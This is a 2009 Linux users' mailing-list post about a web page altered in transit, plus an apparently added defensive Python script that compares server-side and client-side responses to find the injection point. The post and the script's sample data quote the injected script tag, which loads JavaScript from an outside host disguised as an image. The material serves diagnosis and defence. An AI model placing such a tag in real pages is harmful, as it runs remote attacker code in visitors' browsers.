Jaco Kroon on Sun, 3 May 2009 09:27:04 +0200 (SAST)



[GLUG-tech] possible http threat - or just some weirdness


Hi all,

One of my clients just notified me of a "threat" on one of my servers;
when I request the site via Mozilla Firefox, the first lines read as
follows:

<script language=javascript src=http://phpl.ca/Img/pen.gif></script>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd";>
<html>

I get the same with wget from my desktop machine.

If I request this on the server itself using wget, I get this as is
without the first script line.

This to me (without going the tcpdump route on the server itself)
indicates that my data is being modified in transit!  Now, we all know
this is perfectly possible; the question is - how do I figure out where
this is happening, and which ISP should I get to clean up?  Based on my
incoming path this is either SAIX or IS, and I rather suspect it will be
SAIX's transparent proxies - but how do I confirm that?

If this wasn't happening on each and every single request I'd say we
have a possible split-response HTTP proxy poisoning attack, but those are
generally not overly reliable and were still under heavy research last I
checked.

I've made a copy of pen.gif (which as expected turns out to be
javascript code).  What else should I be gathering around this?

Jaco

-- 
To unsubscribe: send the line "unsubscribe glug-tech" in the
subject of a mail to "glug-tech-request@xxxxxxxxxxxx".
Problems? Email "glug-tech-admins@xxxxxxxxxxxx". Archives are at
http://www.linux.org.za/Lists-Archives/
RULES: http://www.linux.org.za/glugrules.html
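The check the post asks for (confirming that the response is altered between the server and the client) comes down to fetching the same URL from two vantage points and diffing what comes back. The script below is an added example, not something from the post or the list; it embeds two constructed response bodies (a "local" one as returned on the server itself, and a "remote" one carrying the script line the post quotes) and constructed headers, so it runs offline. In practice you would replace the constants with the bodies and headers captured by wget or curl on the server and on the desktop. The function names are hypothetical; the header names it looks for (Via, X-Cache, X-Cache-Lookup, Proxy-Agent) are ones caching proxies such as Squid commonly add.

```python
import hashlib
import re
from urllib.parse import urlparse

# Constructed sample: what a client outside the network received. The first
# line is the injected tag quoted in the post; the rest is an ordinary page.
REMOTE_BODY = (
    '<script language=javascript src=http://phpl.ca/Img/pen.gif></script>\n'
    '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"\n'
    '"http://www.w3.org/TR/html4/loose.dtd">\n'
    '<html>\n<body>hello</body>\n</html>\n'
)
# Constructed sample: what the server itself returns (same page, no first line).
LOCAL_BODY = REMOTE_BODY.split('\n', 1)[1]

# Constructed sample headers; a transparent cache typically adds Via/X-Cache.
REMOTE_HEADERS = {"Server": "Apache", "Content-Type": "text/html",
                  "Via": "1.1 proxy.example.invalid (squid)"}
LOCAL_HEADERS = {"Server": "Apache", "Content-Type": "text/html"}

# <script ...> tags whose src may be unquoted, as in the quoted line.
SCRIPT_SRC = re.compile(r'<script\b[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
# Where the real document starts; anything before this is suspect.
DOC_START = re.compile(r'<!DOCTYPE|<html\b', re.I)
# Headers that hint a proxy or cache handled the response (assumed list).
PROXY_HEADER_NAMES = {"via", "x-cache", "x-cache-lookup", "proxy-agent"}


def sha256(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def scripts_before_doctype(body: str) -> list:
    """src URLs of script tags that sit before the DOCTYPE/html start."""
    m = DOC_START.search(body)
    prefix = body[:m.start()] if m else body
    return SCRIPT_SRC.findall(prefix)


def compare_bodies(local: str, remote: str) -> dict:
    """Diff the server-side body against the client-side body."""
    injected_prefix = ""
    if remote != local and remote.endswith(local):
        # Remote is the local page with something prepended: isolate it.
        injected_prefix = remote[:len(remote) - len(local)]
    local_scripts = set(scripts_before_doctype(local))
    remote_scripts = scripts_before_doctype(remote)
    return {
        "identical": sha256(local) == sha256(remote),
        "local_sha256": sha256(local),
        "remote_sha256": sha256(remote),
        "injected_prefix": injected_prefix,
        "injected_scripts": [s for s in remote_scripts if s not in local_scripts],
    }


def proxy_headers(headers: dict) -> dict:
    """Response headers that suggest an intermediate proxy or cache."""
    return {k: v for k, v in headers.items() if k.lower() in PROXY_HEADER_NAMES}


def script_hosts(urls: list) -> list:
    """Hostnames the injected scripts are loaded from, for the report/IoC list."""
    return sorted({urlparse(u).hostname for u in urls if urlparse(u).hostname})


def report(local: str, remote: str, local_hdr: dict, remote_hdr: dict) -> str:
    """Human-readable summary to attach to a complaint to the upstream ISP."""
    cmp = compare_bodies(local, remote)
    lines = [f"identical: {cmp['identical']}",
             f"local  sha256: {cmp['local_sha256']}",
             f"remote sha256: {cmp['remote_sha256']}"]
    if cmp["injected_prefix"]:
        lines.append(f"bytes prepended in transit: {cmp['injected_prefix']!r}")
    if cmp["injected_scripts"]:
        lines.append("injected script hosts: " +
                     ", ".join(script_hosts(cmp["injected_scripts"])))
    extra = {k: v for k, v in proxy_headers(remote_hdr).items()
             if k not in proxy_headers(local_hdr)}
    if extra:
        lines.append(f"proxy headers seen only remotely: {extra}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(LOCAL_BODY, REMOTE_BODY, LOCAL_HEADERS, REMOTE_HEADERS))
```

Feed it the raw bodies and headers from `wget -S --save-headers` (or `curl -D -`) run on the server against 127.0.0.1 and run from the outside; identical hashes mean the server is serving the script itself and the problem is on the host, while a prepended prefix plus a Via header that only the outside fetch shows points at an intermediary on the path. Repeating the outside fetch through a different upstream (or over HTTPS, which a transparent cache cannot rewrite) narrows down which hop is responsible.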